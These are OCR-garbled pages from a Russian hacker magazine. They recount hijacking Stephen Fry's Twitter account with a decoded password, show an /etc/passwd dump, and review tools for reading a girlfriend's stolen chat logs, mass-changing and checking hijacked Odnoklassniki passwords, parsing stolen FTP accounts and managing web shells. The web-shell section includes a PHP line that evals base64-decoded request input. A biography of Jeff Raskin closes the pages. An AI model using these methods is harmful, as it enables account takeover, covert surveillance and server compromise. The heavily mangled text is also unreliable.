Ріоаііпд Иі-аг ШрѴЛніГуГаВІоб мм V* 
(еяиг«) Ггогп раде апісіе ст 'ЛЧаресІів *М 
Ызу 

аЬоіі?.ч Ао«Г5 ауе 



' сгпмѵітят 

бо $ее @а»рЬяЛу оп ГГ ипеа сопсел 

іггЛгаО Ы Ьспд п а Ьогшд сагвтопу 
Ал у НдМ 6о і>; аѵаіІаЫе Ьу пом? 
абоигі Лоис ере 

Ябг /ейаг^г! .^-.ігр*іггт*гѵ Сап уои 

диезз *ДпсЬ опе іа МісЬзеІ -ІаскзолЧ 
Ыал бвр Ш у*лЬО 
«ЬаиГі Ноигауп 

замуои оп 

а ноте* ю Оаогдо» «зйау Тѣ»ч п« 
зотлмпа опе зеез еѵиу Дву, 

«Донг зЛоигидо 




ѴІЕМ ли. ТМББТЗ ѵпю Тат фіберПпгЛг, | кпом Ьомуои ^ 

ТВИТЫ, ВСТРОЕННЫЕ ПРЯМО В САЙТ АКТЕРА 



1окітагоз@зкерЬепкгу Ном аЬоик Ьом Дмитрий Дмитриевич 
Шостакович гасіісаііу сЬапдесІ уоиг Ііке апсі Іізкепіпд 
ЬаЬікз . 

ШіккіС57@зкерЬепкгу кеіі кЬет аЬоик Киззіа, Шадпег апсі 
уоиг регкогтапсе ак СІазкопЬигу 

ѵа1раппа@зкерЬепкгу I ат акгаісі, ѵегу акгаісі! 

Вепп2100@зкерЬепкгу І'ІІ Ье максЬіпд уои коо 

кЬізЬеагкЬеак 2 @зкерЬепкгу Ьаѵе кип іп КІДЗЗІА! В) 

шгакЬокадопу@зкерЬепкгу сооі іп Киззіа? Ьом із ік??? 



сіЗЬ20= 1 ) ; 

?> 

Как видно, переменная 5Р_Т\Л/1ТТЕР_РА55\Л/0РШ зашифрована в 
Ьазе64, так что надо лишь пропустить это значение через функцию 
Ьазе64_сІесосІе и получить итоговый парольѵѵ41 Іа8уоп37ѵѵо4. 
Конечная цель почти достигнута! Пароль получен (а такой пассворд 
вряд ли возможно подобрать с помощью грубой силы]. Осталось зайти 
в актерский аккаунт на Ьл/іНег.сопп и оста вить там свое послание для 
будущих поколений. 

ТВИТТЕР 

Ну-с, заходим на Ь/ѵіиег.сот . вбиваем в соответствующие поля логин 
зіербепіту и пароль\л/41 1а8уоп37\л/о4 и оказываемся залогиненны- 
ми под аккаунтом Фрая :]. После логина сервис задает нам простой 
вопрос «ѴѴЬаІ: аге уои б о іпд?», на который мыс радостью отвечаем «ГК 
ЬеѵѵаІсЫпд уои! Ргот Риззіа ѵѵііЬ Іоѵе :]» (результат этого нехитрого 
действия ты можешь видеть на скриншоте]. В течение нескольких ми- 
нут после отправки моего сообщения фанаты Стивена начали постить 
свои ответы: 

КедШошЗопдз Ьу ТЬе Роіісе апЬ Макк Мопгое. ТЬіз із а 
диіг, гідЬк? КТ @зкерЬепкгу: І'ІІ Ье максЬіпд уои! Ргот 
Киззіа мікЬ Іоѵе : ) 



СуЬгНмк@ зкерЬеп кгу Уоиг іп Киззіа? Шіеге аЬоик іп Киззіа 
аге уои ЗкерЬеп? 

сЬгізсаккапеоКТ (ЗзкерЬепкгу : I ' 11 Ье максЬіпд уои ! Ргот 
Киззіа мікЬ Іоѵе : ) ок Шатез! 

Век ку_В і к сЬ@ зкерЬеп кгу апсі і'11 Ье максЬіпд уои оп сіаѵе, 
кгот Шаіез мікЬ Іоѵе : ) 

зз оез@зкерЬепкгу Аге уои іп зкііі Киззіа? 

тіо@зкерЬепкгу мом о_0 мЬеге аге уои пом, ЗкерЬеп? 

Похоже, никто не догадался, что аккаунтактера взломан, а фраза 
«Ргот Риззіа ѵѵііЬ Іоѵе» вовсе не означает, что Фрай сейчас находится 
в России. 

НЕХИЛЫЙ ФЛЕШМОБ 

Завладев аккаунтом известной личности на каком-нибудь популярном 
онлайновом сервисе, можно устроить не только нехилый флеш м об, но 
и полноценную скам/фишинг/спам атаку. Но, конечно, самым забав- 
ным в такой ситуации было недавнее сообщение на Твиттере Бритни 
Спирс о ее смерти :). 

Р.З. Спустя пару минутя удалил свой пост из микроблога, ибо моя 
тонкая душевная организация не позволяеттравмировать огромную 
армию поклонников Стивена Фрая, не 



ИНКЛУД/ЕТС/РА55ѴѴ0 
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Бесплатная игра 

Травиан 



НОМЕ «ВЮС ^АІЮІО ѴШЕО ♦ГОР.ИМ рСШВРКУ фМОАВ ©РЕАТІІЯЕЗ фОЕМЕКАЕ ЗТОКЕ 



Щ СкІГВРЙУ Щ ЗТЕРНЕМ^ Т ѴДТТЕЙШіЗЗ 



гаокхіаіО гооь/гоок/Ъігі/ЬазЬ гіаетоп х 1 : ѴсІаетоп /изг/ЕЬіп /Ьігі/зТі Ьіп:>с 2 : 2 : Ьіп :/Ьіп :/Ьіп/ 5 Н 
зу 5 ;х; 3 : 3 ;зу 2 ;/сІеѵ;Лзіп/ 5 Ь Еупс:х 4 :Б 55 Э 4 : 5 упс;/Ьіп:/ЬііѴ 5 упс даппез хб^БОідатез /изг/ 
да т ез:/Ып/ 5 Н тэп:х: В: 1 2 : та п:/ѵаг/с асЬе/тап;/Ьіп/ 5 Іі Ір х 7 : 7 : Ір: /ѵаг /5 роо 1 Лрй:/Ьіп/ 5 Іі 
тэіі: х 8 ; В; таіі ;Л/зг/таіІ: /Ьіп/^Н пеѵ^х 9 : 9 : гегѵз: А^г/арооі/пе^з: /Ьіп/эЬ иисрх 10 : 10 : ии ср :і 
ѵаг/ 5 роо 1 /ииср:/Ьіп/ 5 Ь рпохух 1 3 : 1 Э:ргоху/Ьіп:/Ьіп/ 5 ^і ѵмлл^гіаіахЭЗ:ЭЗ:и^ 
штМЫъЬ Ьаскир:х: 34 : 34 :Ьаскир Л^г/Ьаскирз:/Ьіп/ЕЬ 1 ізкхЗѲ:ЗВ:МэіЕіпд Іігі: Мападеп/ 
ѵзг/ІІ 5 к/Ьіп/ 5 Ь ігс:хЭ 9 : 39 :ігссі:/Ѵаг/ігігі/ігсй:/Ьіп/з!і дпа^:х 41 41 Спай Вид-НерогТіпд 



Ф Лоіп СЬУВРЯУ ап<1 так-? йгіап 
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> ѵѵагпіпд 



Все описанное в статье 
является плодом боль- 
ного воображения ав- 
тора. Любые совпаде- 
ния с существующими 
сайтами случайны. Ни 
редакция, ни автор не 
несут ответственности 
за любой возможный 
вред, причиненный 
материалами этой 
статьи. 
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Программы для хакеров 



» ІІІДІІ ДЛ В I Д М МДИ.КЦ НІ5Т0КУ КЕАРЕВ 
I ИЯУІМР0У52000/ХР 

I ишаа сдкік 





Читаем хистори переписки из мэил-агента 

Различные ІМ-клиенты в последнее время 
расплодились в огромном количестве. Причина 

— растущая популярность онлайновых систем 
обмена мгновенными сообщениями. В качестве 
примера можно привести та і 1-агент от Маіі.ги, 
набравший немаленькую аудиторию юзеров. 
Мессенджер получился действительно удобный 
и функциональный, но с одним недостатком — чу- 
жую историю переписки в нем почитать не так-то 
просто. А ведь иногда доступ кхистори необходим, 
особенно, если она слита с компа твоей девуш- 
ки :). Однако решение есть, и имя ему — Маіі.ги 
Нізіогу Пеабег. Тулза предназначена для дешиф- 
ровки логов таіі-агента и приведения истории 
переписки в удобочитаемый вид. Использовать 

уТИЛу ДОВОЛЬНО ПРОСТО: 

1 . Сливаем интересующие нас логи пе- 
реписки с компа жертвы, вида: ЫаЫа@ 
таіі . гнЬізбогу . РхР 

2 . Копируем софтинку с нашего БѴБ себе 
на винт и запускаем через консоль 

3. Указываем Мзбогу-файл и файл для 
сохранения результата: 

С : \сопѵ. ехе ЫаЫа@таі1 . гнЬізбогу . 

Рхб ЫаЫа@таі1 . ги . РхР 
4 . Получаем файлик ЫаЫаѲтаіІ . и . РхР , 
в котором и лежит расшифрованная исто- 
рия переписки : ) 

Тулза работаетслогами таіі-агента <= 5.3- 
версии, такчтолибо всячески агитируй автора 

— товарища Оагік'а — на дальнейшее развитие 
утилы, либо отговаривай свою девушку обновлять 
таіі-агент. Сорцыутилыты найдешь на нашем 
диске. 



РА55 1 Ѵ0№ СНАІЧСЕР & АСС01ЛЧТ 
СНЕСКЕР 

ННУІЫР ОУЭ 2000/ХР 

ИаіВИ^ЕЕВНУА 

В прошлых выпусках Х-Тулз я публиковал 
несколько интересных утил, облегчающих всес- 
тороннюю работу с популярными социальными 
сетями. Не будем нарушатьтрадицию и сразу 



перейдем кописанию полезного софта, который 
на этот раз предназначен исключительно для 
ресурса обпокіаззпікі.ги и включает в себя две 
утилы: Обпокіаззпікі.ги РаззѵѵогсІ Сбапдеги 
Осіпокіаззпікі.ги АссоипіСЬескег. Каквидно из 
названий, проги позволяют чекать аккаунты и 
менять на них пароли в автоматическом режиме. 
Начнем с ченджера пассов ака утилы для массо- 
вой смены паролей на акках в «Одноклассниках». 
Тулза позволяет: 

• менять пароли на аккаунтах на один 
заданный пасс 

• менять пароли на аккаунтах на гене- 
ренные пассы 

Все аккаунты должны храниться в файле 
ассоипІз.М, вид записей: логин ; па роль, В 
процессе работы утила использует несколько 
файлов: 

доосІ_асс . бхб — файл, в который по- 
мещаются все успешно смененные пары 
логин; новый_пароль 
ЪасІ_асс . бхб — файл, в который поме- 
щаются все неудачно смененные пары 
логин; старый_пароль 

еггог_асс . бхб — файл , куда помещаются 
аккаунты, в процессе обработки кото- 
рых возникли непредвиденные ошибки 

Из возможных причин, по которым аккаунты 
помещаются в ЬасДасс.М, следует выделить: 

• неверный старый пароль 

• не подходит новый пароль (не соот- 
ветствует правилам в социальной сети) 

• аккаунт заблокирован 

Какты понимаешь, перед запуском ченджера 
пассов желательно прочекатьсписокаккаунтов 
на вал ид. Для этого мызаюзаем вторую утилу — 
чекер акков для «Одноклассников»: 

• Все аккаунты должны храниться в 
файле ассоипбз . бхб , вид записей: 
логин ; пароль . 

• В процессе работы утила использует 
несколько файлов : 

дооб_асс . бхб — файл, в который поме- 
щаются все валидные аккаунты 
Ыоск_асс . бхб — файл, в который поме- 
щаются все заблокированные аккаунты, 
доступ к которым закрыт из-за частых 
попыток логина 

Ьаб_асс . бхб — файл, в который помеща- 
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Файл ■ассоішиджГ формата. 'лвгнн;лароль* 



Г Один пароль длл всех 

от 6 до 12 символов - цифры и английские буквы 



случайный пароль иное ммволоа 




Акквунтое: 

Обработано: 
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Пароль сменён - 


■дря!_ассЛіГ 


Пароль НЕ сменён - 'ЪаЙ.асс.Ш 1 


ошибка - 'еі-гог_асг.гхг 
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Массово меняем пароли на акках 
в «Одноклассниках» 



ются все невалидные аккаунты 
еггог_асс . бхб — файл, в который поме- 
щаются аккаунты, в процессе обработ- 
ки которых возникли непредвиденные 
ошибки 

От себя добавлю, что обе утилы довольноудобны 
и вполне работоспособны. Причем, каждая из 
тулз является полноценным \л/іп32-приложением, 
а не РНР/перл-скриптом, какиханалоги. Благо- 
дарим автора — Ідет. ВіІѴа — и сливаем проги с 
нашего диска :). 

бВЭиШгНЕи. МАІЧАСЕР 

Гііа*міх/Уім 

ЦіИі]Д КЕ:І5Т АП 

Ежедневно, ломая тот или иной ресурс, мы попол- 
няем свою коллекцию ѵѵеЬ-шеллов. Незнаю, как 
утебя, ноу меня в закладках насчитывается более 
сотни соответствующих линков, и это далеко не 
предел :). Возникаетвполнелогичный вопрос: 
каксортироватьи чекать на валид весь архив 
шеллов? Для этой цели товарищем Кпз^АЦиОМ 
была написана небольшая утила под названием 
«5ЬеІІ тападег», позволяющая парсить веб- 
шеллы потвоемуусмотрению. Тулза представ- 
ляетсобой пхп-скрипт, обладающий такими 
функциями, как: 

• Проверка веб-шеллов на валидность 
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• Чекинг веб -шеллов с последующим оп- 
ределением РК/ТИЦ/А1еха_Капк 

• Возможность ведения заметок по каж- 
дому веб-шеллу 

• Массовое выполнение команд (отме- 
чаем веб-шеллы, вводим команду и на- 
блюдаем результат выполнения отдельно 
для каждого веб-шелла) 

• Добавление веб-шеллов из списка 

• Возможность экспорта результатов 

• Наличие авторизации 

Использовать скрипт довольно просто: 

1. Запускаем скрипт, указав пароль 
(по дефолту: раззтлгогсі) 

2 . Создаем необходимую таблицу в БД 

3 . Редактируем файл скрипта , изменив 
значение переменной $іпзба11 на 1 и 
внеся данные о БД: 

// Настройка БД 

$бЬ_]тозб = ' ' ; // Хост 
$с0э_1одіп = ' ' ; // Пароль 

$бЪ_раззѵгогс1 = ' ' ; // Пароль 

$бЬ_паше = ' ' ; // Имя базы данных 

// Настройка ЗНеІІ Мапапдег 

$изе_аибй = 1; // 1 — Использовать ав- 
торизацию, 0 — не использовать 
$іпзба11 а 1; //заменить на 1, после 
создание таблицы 

$раззѵгогс! = 'раззмогб' ; //Изменить на 



4 . Чтобы добавленный веб-шелл чекался — необ- 
ходимо в его код добавить пару строк: 

іб (іззеб ($_СЕТ [ 'ш' ] ) ) {есНо 1; ехіб;} 
еізеіб ( іззеб ( $_СЕТ [ ' еѵ ' ] ) ) { $ззз 
=Ьазеб4_бесобе ( $_СЕТ [ ' еѵ ' ] ) ; 
еѵа1($ззз); ехіб; } 

5 . Все, теперь чекер будетуспешно взаимодейст- 
воватьсдобавленным веб-шеллом. 



Ед*гчіх/уііч 

ІОѴѴЕ] 



АВТОР: 



При сборе фтп-акков каждый раз встает один итот 
же вопрос: каклучше всего ихотпарсить? Причем, 
речь идет нетолько о проверке валидности, но 
и о всевозможных сортировках доменов. Итак, 
представляю тебе утилу под незамысловатым 
названием «РТР Рагзег», способную отпарсить 
списокфтп-учеток по самым разнообразным 
критериям. Тулза представляет собой РНР-скрипт 
весом вЗКб и среди ее характеристик: 
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• Поиск красивых доменов среди базы 
фтп-акков (например, ЫаЫа.сот) 

• Возможность указания максимальной 
длины домена 

• Возможность поиска определенных 
слов среди доменных имен 

• Возможность осуществления поиска в 
субдоменах 

• Функция сохранения результатов сор- 
тировки 

• Автоматическая подсветка доменов , 
аккаунтов и искомых фраз в тексте 

• Возможность соединения с любым фтп- 
сервером из списка после обработки 
запроса 

Чтобы за юзать скрипт, следует задать ему не- 
сколько обязательных параметров, таких как: 

$2 = доменная зона (например, & 2 =сот) , 
если ограничений нет, то * (например, 
&2 = * ) 

$ш = максимальная длина домена (на- 
пример, &т=14) , если ограничений нет, 
то * (например, &т=*) 

$Ьазе = файл с фтп-акками, который 
располагается в каталоге ./Ьазез (на- 
пример, &Ьазе=бі1е . ДхР) 

$а11 = включить поиск среди субдоме- 
нов (например, &а11=1 , &а11=0 ) 

$заѵе = включить функцию сохране- 
ния результатов запроса (использу- 
ется каталог . /сдіегіе) , например, 
&заѵе=уез , &заѵе=по 
$ілгогс1 = поиск определенных слов 
в доменных именах (например, 

&ѵ\гогс!=Ы аЫ а ) 

То есть, послетого, какты залил скрипт на сервер, 
а также создал два каталога — ./Ьазез (с фтп- 
листом внутри] и ./циегіез, тебе надо перейти по 
следующему л инку: 

ТШбр : / /твой_хост/рагзег . 
рйр?2=сот&т=14&Ьазе=ТРрз . бхб&а11=0&з 
аѵе=уез&ілогб=ТгееТюзбіа . сот 

Какты уже понял, значения переменных в запро- 
се напрямую зависят оттебя. 



ЗутѴРЫ 



ПРОГРАММА: 



вазѵмвідм 



АВТОР: 



ЗѴМѴРМ 



|ТЕІ_ЕХѴ.СОМ 

Если утебя есть более-менее функциональный 
мобильник, то проблема безопасного веб-сер- 
финга тебе знакома. Под различные мобильные 
платформы соксификаторы не сыщешь днем 



согнем, не говоря уже про полноценный ѴРІ\І. 
Однако если ты являешься счастливым обладате- 
лем девайса на базе ЗутЬіап 05 ЗгсІ, считай, что 
тебе повезло. Нетакдавно для этой ОС появился 
функциональный ѴРЫ-софт под названием 
5утѴРІ\І, поддерживающий протокол РРТРс 
шифрованием 128-битным ключом МРРЕ. Найти 
утилуты сможешь на портале ѵѵѵѵѵѵТеІехѵ.сопп . ко- 
торый принадлежит разработчикам всевозмож- 
ного полезного софта подЗутЬіап 05. Здесьтебе 
и 5утР0Р (5утЬіап Регионе ОезкЬр Соппесбоп 
СбепЙ, и 5утІ\ІС (Ыеб/ѵогк Соттапбег] и много 
чего еще. Правда, весь софт платный, нодляжи- 
телей Х-ІІ55Н действует скидка в 40% Не Іеху, сот/ 
5ирроН/РиЫісабоп5.азрх?собеіб=ѴѴ05ВІ6Х6КѴ ]. 
что нетакужи плохо. На самом порталеты мо- 
жешь слить триальную версиюутилы и втечение 
1 4 дней оценить все ее преимущества. Ну и после 
оценки по достоинству, разумеется, купить за 
какие-то жалкие 820 рублей :). 

Для инсталляции потребуется пройти процедуру 
регистрации и указать все необходимые данные 
(етаіі, ітеітвоейтрубы]. Это обязательно, ибо 
копия полученной тобой тулзы привязывается 
кІМЕІ-номерутелефона.Такили иначе, после 
получения линка на софт следует перейти кее 
настройке, а именно: 

1 . Устанавливаем 

2 . Ребутим мобилку 

3. Запускаем утилу , указываем па- 
раметры соединения, точку доступа 
(СРКЗ/М-Еі) , ІР-сервера, логин с 
паролем и имя точки доступа, которая 
будет ассоциироваться с ѴРЫ-каналом 
4 . Выбираем пункт меню «Проверить» . 
Если все в порядке — софтинка выдаст 
сетевые реквизиты, которые должны 
быть получены под ѴРЫ ( ІР/маска/шлюз/ 
ШЗ) 

5 . Запускаем стороннюю программу 
(можно при вырубленном ЗутѴРІН) и при 
запросе точки доступа лицезрим свеже- 
созданную виртуальную точку. Недолго 
думая, выбираем ее, и весь трафик пос- 
лушно форварднется на ѴРЫ- туннель 

На данный момент софтина адаптирована прак- 
тически под все юзабельные5утЬіаіп-приложе- 
ния и работаете большинством известныхѴРІЧ- 
сервисов.Такчто только ленивый неспособен 
скачать, установить и постоянно использовать эту 
прекрасную утилу лг 
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МАРИЯ «МЦЩ» НЕФЕДОВА 

/ МІГПІІ_І_@ПЕАІ_.ХАКЕР.ПІІ / 

ИНТЕРФЕЙСЫ 
ПОД ДРУГИМ 
УГЛОМ 



1 ) Джеф Раскин с макетом Сапоп Саі: 

2 ) Совсем еще молодой Раскин (70-е годы] 
ЗІНовенькие «Кошки» 

4 ) Кусочек мастерской Джефа 




Жизнь и исследования Джефа Раскина 



История ІТ знаетнемало примеров «непризнанных гениев». Наиболееярко 
это подтверждают та кие личности, как Алан Тьюринг, или Дуглас Энгельбарт, 
человек придумавший «мышь», но не заработавший на этом почти ничего. 

У нашего сегодняшнего героя случай, в целом, похожий. Джеф Раскин известен 
во всем мире как создатель Ар ріе МасіпІозЬ, но немногиезнают, что онтакже 
положил полжизни на борьбус несовершенством пользовательских интерфей- 
сов, а в приснопамятном Арріе не продержался даже до релиза «Макинтоша». 



ЗАБЫВЧИВАЯ 

ПРЕССА 

Итак, речь пойдето профессоре 
Джефе Раскине, и перед тем как 
перейти к повествованию, хотелось 
бы отметить, что ни здесь, ни после 
я вовсе не пытаюсь называть его 
на панибратский манер. Дело в 
том, что Джеф Реі] — это полное и 
довольно редкое имя, а отнюдь не 
уменьшительное, как можно было 
бы подумать. 

Рассказывать историю Раскина 
можно по-разному, ужочень неор- 
динарной он был личностью, ноя, 
пожалуй, начну ее с конца. 

Джеф Раскин ушел из жизни 
26-го февраля 2005, в возрасте 61 
года. Причиной смерти стал рак 



поджелудочной железы, который 
емудиагностировали всего годом 
ранее. 

После смерти Раскина СМИ всего 
мира, последнее время не очень-то 
баловавшие профессора своим 
вниманием, буквально взорвались 
заголовками в духе: «Умер «отец» 
Макинтоша». И нельзя сказать, что, 
награждая Джефа этим титулом, 
они погрешили против правды. 
Хотя, конечно, над созданием 
«Мака»трудилась целая группа 
специалистов (надеюсь, среди на- 
ших читателей нетлюдей, которые 
до сих пор свято верят в то, что все 
«яблочные» продукты — дело рук 
исключительно Стива Джобса?]. 
Однако не совсем понятно другое — 



причина, по которой пресса пред- 
почла «забыть» о других заслугах 
и исследованияхДжефа Раскина. 
Ведь, «Мак», по сути, был для него 
лишьодной из многих вех. Сегодня 
мы попробуем посмотреть на 
Джефа не только как на «создателя 
Макинтоша». 

САМОЛЕТЫ, 

МУЗЫКА И СПОРТ 

Чтобы объяснить, почему работа 
в Арріе отнюдь не была главным 
достижением вжизни Раскина, 
достаточно рассказать, чем он 
занимался до этого. В совсем еще 
молодую компанию Арріе Раскин 
пришел в 1978 году, став всего 
31-м ее сотрудником. Учитывая, 



что родился он 23 марта 1943, 
несложно подсчитать, что ктому 
времени Джеф уже не был выпуск- 
ником вуза, с горящими глазами 
рвущимся изменять мир. Более 
того — хотя компьютеры и высокие 
технологии интересовали его 
практически всюжизнь, Раскин 
никогда не ограничивался только 
ими, лишний раз подтверждая, что 
«талантливый человек, талантлив 
во многом». До своего прихода 
в Арріе Раскин успел нетолько 
получить образование и попро- 
бовать себя в самых разных об- 
ластях. Кроме этого, он, очевидно, 
понял, что предпочитает работать 
на себя, и обзавелся собственным 
делом. И пусть бизнес у Джефа 
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был весьма скромный, никаких 
тебе корпораций и мега-успеха, — 
он был весьма нетривиален. Как 
ты уже, наверняка, догадался, с ІТ 
дело Раскина была связано лишь 
косвенно. 

Джеф на протяжении всей жизни 
оставался заядлым моделистом — 
миниатюрные самолеты были его 
настоящей страстью. Так что одна 
из его фирм занималась произ- 
водством наборов «сделай сам» для 
авиамоделистов, и для Джефа это 
был не просто бизнес: самолетики 
он нетолько продавал, но и самосто- 
ятельно проектировал. 

С этим, кстати, связан один ин- 
тересный факт. Еще в 70-х годах 
Раскин придумал и воплотил 
в жизнь управляемый планер 
ѴѴезІегп ѴѴіпсІ («Западный Ве- 
тер»), ставший среди ценителей 
популярной моделью. Но нам 
интересен не сам самолет, а то, 
что Раскин обладал удивительным 
качеством — любые задачи он 
всегда решал совершенно нестан- 
дартными методами, привнося в 
уже сложившиеся и отработанные 
процессы что-то абсолютно новое 
и переворачивая привычноес 
ног на голову. Вот и для проекти- 
ровки ѴѴезІегп ѴѴіпсІ Джеф решил 
воспользоваться последними 
достижениями прогресса (на 
дворе напомню, начало 70-х) и 
прибег к помощи компьютера, 
самостоятельно написав нужный 
софт. С его помощью была создана 
трехмерная модель самолета и 
развертки, необходимые для пос- 
ледующей сборки модели в реале. 



Чего же здесь удивительного, 
спросишьты? А«3ападный ве- 
тер», между прочим, стал первой 
в мире серийной авиамоделью, 
разработанной таким образом. 

Но если ты решил, что до Арріе 
Джеф занимался исключительно 
игрушечными самолетиками (да 
простят меня авиамоделисты), 
спешу заверить — это не та к! 

Кроме дел, связанных с авиа мо- 
делированием, уДжефа имелась 
и своя консалтинговая фирма, где, 
помимо консультационной де- 
ятельности, он корпел над написа- 
нием мануалов кразным девайсам 
(в числе которых был Арріе II). 

Плюс, Раскин профессиональноза- 
нимался рекламной фотографией 
и имел музыкальное образование, 
подтвержденное практикой — ему 
довелосьдирижировать Нью-йорк- 
ским филармоническим оркестром 
и симфоническим оркестром Сан- 
Франциско. Само собой, это под- 
разумевает, что Джеф великолепно 
играл на целом ряде музыкальных 
инструментов (в их числе нетолько 
фортепиано и ударные, но и альт- 
рекордер и даже орган). На досуге 
он сам писал музыку. 

Также наш герой был в отличных 
отношениях со спортом — прекрас- 
но стрелял из лука и обожал езду 
на велосипеде, которой некоторое 
время занимался вполне про- 
фессионально, например, обучая 
этому студентов Калифорнийского 
университета на кафедре физ. 
подготовки. 

И, как ни парадоксально, при таком 
количестве хобби и любимых дел 



Джеф Раскин успевал увлекаться 
и компьютерами, тоже професси- 
онально. Еще в 1964-1965 годах он 
окончил Университет штата Нью- 
Йорк, получив сначала степень 
бакалавра в области математики, а 
затем и в области философии. Чуть 
позже (1967) к этому добавилась 
степень магистра в области вычис- 
лительнойтехники, полученная 
Раскиным в Университете штата 
Пенсильвания. Такчто, в 70-е Джеф 
уже имел сложившиеся и подкреп- 
ленные знанием дела взгляды на 
развитие компьютерной техники, 
и уже тогда вынашивал ряд идей, 
идущих немного в разрез с курсом 
прогресса. 

Думаю, теперь вопросов отом, как 
и почему Раскин попал в Арріе 
возникнуть не должно, особенно 
учитывая, что «яблочная компа- 
ния»уже имела с Джефом дело, до 
его поступления к ним на работу. 

АРРІ.Е, «МАКИН- 
ТОШ» И СТИВЕН 
ДЖОБС 

Какуже было сказано, отрицать 
вклад Раскина в создание «Мака» 
бесполезно, равно каки недооце- 
ниватьегозначимость. Пришло 
время вернуться к«ябблочкам». 
Когда Раскин только пришел в 
Арріе, его сразуже попытались 
приставить к работе над при- 
ставкой Аппіе, что не вызвалоу 
Джефа никакого восторга. Чтобы 
нетратитьсвое время на неинте- 
ресное ему занятие, Раскин сделал 
ход конем и высказал руководству 
компании одну из собственных 



идей. Уже тогда он хотел создать 
компьютер, ориентированный на 
нужды простых людей, не разбира- 
ющихся во всех этих премудростях, 
недорогой и понятный агрегат для 
«человека с улицы». Интересно, 
что анналы интернета сохранили и 
донесли до нашихднейтот самый 
документ, в котором Джеф излагал 
свою идею, представляя ее на суд 
начальства. 

Верхушка компании, прямо скажем, 
этой мыслью не очень-то загоре- 
лась, неодобрение Раскину все же 
дали и минимальную поддержку 
обеспечили. Тем не менее, на пер- 
вых парах Джеф, по сути, работал 
один. Он дал проекту имя, окрестив 
его «Макинтош» (МасіпІозЫ в честь 
своего любимого сорта яблок, с 
намеренной «ошибкой» в названии 
— чтобы не возникло проблем с 
производителями радиоаппара- 
туры МсіпіозЬ, и занялся делом. 
Постепенно кего разработке- 
исследованию подключились и 
другие сотрудники, в их числе был 
бывший студент Раскина — Билл 
Аткинсон, а также сам Стивен 
Возняк. Однако «Макинтош» 
по-прежнему оставался на вторых 
ролях, и мало кто воспринимал его 
всерьез, ведь у Арріе тогда имелись 
и болееамбициозные и интересные 
проекты. 

Например, «Великий иУжасный» 
Стивен Джобс был поглощен разра- 
боткой дорогостоящей и мощной 
Арріе 1_іза, которая скорее являлась 
рабочей станцией, чем домашним 
ПК. Идея простого и недорогого 
«Мака» Джобсу, грезящему о су- 
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пер-мощных машинах, разумеется, совершенно не нравилась. Согласно 
воспоминаниям Раскина, Стив постояннотвердил, что «из этого [проекта 
« М а ки нто ш »] н и ч е го н е в ы й дет, и это н и ко гда н е будет ра ботать» , а та кже 
постоянно вставлял палки в колеса. В том, что Раскину и Джобсу не 
удавалось найти общий язык, нетничего удивительного еще и потому, что 
Джобс ратовал за неслыханные в те годы использование «мыши» и 6111 
(которыми как раз и должна была обладать «Лиза»), а Раскин с большим 
скепсисом смотрел на эти «гениальные изобретения». Но неизвестно, как 
бы все обернулось в итоге, если бы совсем скоро Джобса не отстранили 
от должности руководителя проекта Шва. Причиной был полный провал 
мощных и дорогостоящих Арріе III, которыми тоже занимался Стив. 
Компьютеры оказались нетолько слишком дорогими и невостребованны- 
ми (шутка ли, Арріе III стоили $5000-8000], они ктомуже горели десятками! 
Последнее происходило «благодаря» сумасшедшим мощностям Арр(е III 
и весьма оригинальным нюансам проектировки — по решению всетого 
же Джобса из корпуса, компактности ради, пришлось выкинуть почти все 
вентиляторы. Арріе Шва, в свою очередь, определенно собиралась пойти 
по стопам Арріе III, что не могло не обеспокоить руководство. Как покажет 
время, опасения были верны, и даже отстранение Джобса не спасло 
проект от фиаско. 

Сидеть без дела обиженный на всех Джобс, конечно, не стал. 
Оставшись за бортом «Лизы», он переключил все свое внимание 
на «Макинтош», внезапно увидев в исследованиях Раскина много 
интересного и многообещающего. Плюс, он твердо решил, что 
переплюнет готовящуюся к выходу І_іва по всем пунктам, и разногла- 
сий между ним и Раскиным моментально стало еще больше. Джобс 
поручил Раскину и части команды работу над ПО, а сам взялся за же- 
лезо, в результате чего «Мак» моментально начал обрастать чертами 
«Лизы», что, само собой, совершенно не понравилось Джефу. Кстати, 
обликом арріе-мышь во многом обязана именно Раскину. Будучи вы- 
нужден мириться с присутствием «крысы» в своем проекте, он решил 
немного переделать ее на свой лад. Избавился отлишних, по его 
мнению, кн опок, и подсмотренный у компании Хе гох трехкнопочный 
грызун стал однокнопочным. 

Приход Джобса, конечно, имел и положительные стороны. Он сумел 
добиться должного финансирования, привлек к разработке несколько 
десятков человек, и «Мак» на глазах превратился в один из топовых 
проектов компании, которым занималась элита. Однако чем больше 
крепло влияние Джобса, тем неуютнее чувствовал себя Раскин — 
его идею извратилиуже почти до неузнаваемости. Дошло до того, 
что Джобс даже пытался переименовать проект, заменив кодовое 
Масіпіозб на Вісусіе, то есть «велосипед». Как ни трудно догадаться, 
из этого ничего не вышло, но нужно сказать, что Стив действительно 
старался — сотрудникам, которые продолжали пользоваться старым 
названием, грозили выговоры. А маркетологи, к которым обратились 
ближе к релизу, лишь каким-то чудом не сумели придумать ничего 
лучше «Макинтоша». 

Когда в 1 982 году Джобс, наконец, окончательно перетянул одеяло на себя 
и возглавил разработку ПО для «Макинтоша», потеснив Джефа и здесь, 
Раскин не выдержал. Безучастно наблюдать за всем этим он не мог, а 



1 ) «Кошка» отСапоп 

2 ) Арріе МасіпІозЬ 

сдвинуть Стивена с намеченного курса не представлялось возможным 
(хотя он, разумеется, пытался — баталии разворачивались нешуточные]. В 
итоге, Джеф предпочел уволиться. В Арр(е не хотели терять ценные кадры 
и даже предлагали Раскину возглавить новое исследовательское подраз- 
деление компании, однако на уговоры он не поддался. 

«КОШКА» И ПОЛЬЗОВАТЕЛЬСКИЕ 
ИНТЕРФЕЙСЫ 

Какова была дальнейшая судьба «Макинтоша» — прекрасно известно, 
более того — об этом написана не одна книга, такчто не станем сверх 
нужного углубляться в историю Арр(е. 

Послеувольнения Джеф Раскин вовсе не думал отчаиваться. Напротив, 
покинув Арріе, он почти сразу переключился на разработку не менее 
интересной машины. Основав фирму Іпіогтабоп Аррііапсе, он занялся ре- 
ализацией тех идей, что безжалостно выкинули из проекта «Макинтош». 
Первым продуктом Іпіогтаііоп Аррііапсе стала карта расширения для 
Арріе II — ЗѵѵуІЮагсІ, содержавшая программный пакетЗѵѵуШ/Ѵаге. И вот 
здесь-то мы вплотную подошли к ключевому моменту — к взглядам Джефа 
Раскина на пользовательские интерфейсы и тому, что из этого получилось. 
